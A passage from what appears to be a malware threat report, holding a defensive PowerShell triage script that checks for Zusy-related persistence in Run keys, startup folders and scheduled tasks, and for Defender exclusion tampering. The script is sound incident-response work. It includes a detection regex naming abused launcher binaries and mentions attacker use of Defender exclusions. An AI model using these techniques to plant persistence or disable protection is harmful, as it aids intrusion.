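    # Get-MpThreat carries names; Get-MpThreatDetection carries the files and processes
    # involved. They share ThreatID.
    $ids = (Get-MpThreat | Where-Object ThreatName -eq $threatName).ThreatID
    Get-MpThreatDetection | Where-Object { $ids -contains $_.ThreatID } |
        Select-Object InitialDetectionTime, ProcessName, DomainUser,
                      @{ Name = 'Resources'; Expression = { $_.Resources -join '; ' } }
}

function Get-RunKeyPersistence {
    # The string set includes several ...\CurrentVersion\Run paths.
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        (Get-ItemProperty -Path $k).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' } |
            ForEach-Object { [pscustomobject]@{ Key = $k; Name = $_.Name; Command = $_.Value } }
    }
}

function Get-StartupFolderItems {
    # Strings reference the all-users Startup folder; check the per-user one as well.
    $folders = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
               "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    Get-ChildItem -Path $folders -Force -ErrorAction SilentlyContinue |
        Select-Object FullName, LastWriteTime
}

function Get-SuspiciousScheduledTasks {
    # Sub-rules for ScheduledTask, Rundll32, Regsvr32, Mshta and PowerShell point at
    # LOLBin launchers; list tasks whose action runs one of them.
    Get-ScheduledTask | Where-Object {
        $_.Actions | Where-Object { $_.Execute -match 'powershell|pwsh|cmd|rundll32|regsvr32|mshta|wscript|cscript' }
    } | Select-Object TaskPath, TaskName, State,
            @{ Name = 'Execute';   Expression = { ($_.Actions.Execute)   -join ' | ' } },
            @{ Name = 'Arguments'; Expression = { ($_.Actions.Arguments) -join ' | ' } }
}

function Get-DefenderTampering {
    # Some samples run Add-MpPreference -ExclusionPath. List current exclusions, recent
    # configuration changes (event 5007) and real-time protection being disabled (5001).
    $p = Get-MpPreference
    [pscustomobject]@{
        ExclusionPath      = $p.ExclusionPath
        ExclusionProcess   = $p.ExclusionProcess
        ExclusionExtension = $p.ExclusionExtension
    }
    Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5007
        StartTime = $since
    } | Select-Object TimeCreated, Id, Message
}

'== Detections ==';                    Get-ZusyDetections           | Format-Table -AutoSize -Wrap
'== Run keys ==';                      Get-RunKeyPersistence        | Format-Table -AutoSize -Wrap
'== Startup folders ==';               Get-StartupFolderItems       | Format-Table -AutoSize
'== Scheduled tasks ==';               Get-SuspiciousScheduledTasks | Format-Table -AutoSize -Wrap
'== Defender exclusions/tampering =='; Get-DefenderTampering        | Format-List
```

Any exclusion path that was not set by your own deployment, and any 5007 event coinciding with the detection time, should be treated as attacker activity and reverted with Remove-MpPreference after the evidence has been captured.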
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 24/12/2025.